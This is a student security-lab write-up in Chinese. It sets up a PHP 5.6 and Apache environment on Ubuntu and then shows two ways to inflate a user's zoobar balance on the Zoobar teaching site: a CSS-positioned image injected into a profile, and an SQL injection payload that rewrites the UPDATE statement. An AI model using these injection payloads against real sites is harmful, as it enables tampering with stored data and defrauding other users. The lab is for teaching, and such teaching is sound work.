資訊保安實踐Lab2-CSS
資訊保安實踐Lab2-CSS
Ubuntu20.04 安裝 php5.6 ,php5.6-mysql,apache2,mysql5.7
安裝php5.6,php5.6-mysql,apache2
sudo apt-get install -y language-pack-en-base
sudo LC_ALL=en_US.UTF-8 add-apt-repository ppa:ondrej/php
sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
sudo apt-get install php5.6
sudo apt-get install php5.6-mysql
sudo apt-get apache2
sudo a2dismod php7.4
sudo a2enmod php5.6
sudo service apache2 restart
安裝mysql5.7
https://blog.csdn.net/Deadly_97/article/details/111675825
問題1
問題2:Zoobar網站尋找漏洞
Manage your profile in the zoobar website, make your zoobars appear more than you really own. That is, after you modify your profile, when others or yourself look up your profile, they will see more zoobars than you actually own.
方法一:利用css
-
在a使用者的profile中輸入
<img src="http://106.13.136.87:8080/100.png" style="position:relative;top:-55px;right:-63px;width:34px;height:21px"/>
-
然後b使用者在User中輸入使用者名稱a,就會看到a有100個zoobars,其實a並沒有100個
方法二:sql注入
-
原始碼中,處理$profile引數sql語句如下:
$sql = "UPDATE Person SET Profile='$profile' ". "WHERE PersonID=$user->id";
-
假設第一個使用者a在profile中輸入
',Zoobars=9999,Profile='Welcome to my profile!
-
最後執行的sql如下
update Person set Profile='',Zoobars=9999,Profile='Welcome to my profile!' where PeronID=1;
-
最後再去查a的餘額就有9999個zoobars
相關文章
- 資訊保安實踐Lab3-CSRF&XSS&點選劫持
- 資訊保安
- 智慧網聯汽車資訊保安風險分析及實踐探討
- 【三】資訊保安
- AIGC資訊保安-在應用系統中安全防範過程實踐應用AIGC
- 物聯網資訊保安
- 關於資訊保安的
- 資料庫的資訊保安管理資料庫
- 代理IP如何實現網路資訊保安防護?
- 資訊保安對稱密碼分析實驗總結密碼
- 曹政資訊保安課筆記-常見資訊保安的常識錯誤筆記
- 中新賽克夯實資訊保安,助力通訊部件國產化
- 資訊保安檢查內容
- Cybellum—資訊保安測試工具
- 如何保障Cookie的資訊保安Cookie
- 分享資訊保安工作小記
- 人工智慧與資訊保安人工智慧
- 資訊保安與Linux系統Linux
- 資訊保安數學基礎
- [資訊保安] WEP 是什麼
- 員工電腦資訊保安
- DefenseCode — 資訊保安測試工具
- 資訊保安作業1——SYSU
- 海雲安個人隱私資訊保安影響評估系統入個人資訊保護創新實踐案例
- 和CISSP並肩的資訊保安認證國際註冊資訊保安經理CISM
- 什麼是資訊保安風險評估?資訊保安風險評估的步驟?
- 聚焦實踐|綠盟科技支援全國大學生資訊保安競賽東北、華中賽區
- 古代密碼學與資訊保安密碼學
- 資訊保安問題與防範
- Linux賬戶資訊保安深入剖析Linux
- 資訊保安概論複習3
- 資訊保安概論複習-2
- 資訊保安概論期末複習
- 大資料資訊保安問題有哪些大資料
- 雲主機如何保證資訊保安?
- 資訊保安與密碼學概論密碼學
- 美國任命首位首席資訊保安官
- 菜鳥的資訊保安學習之路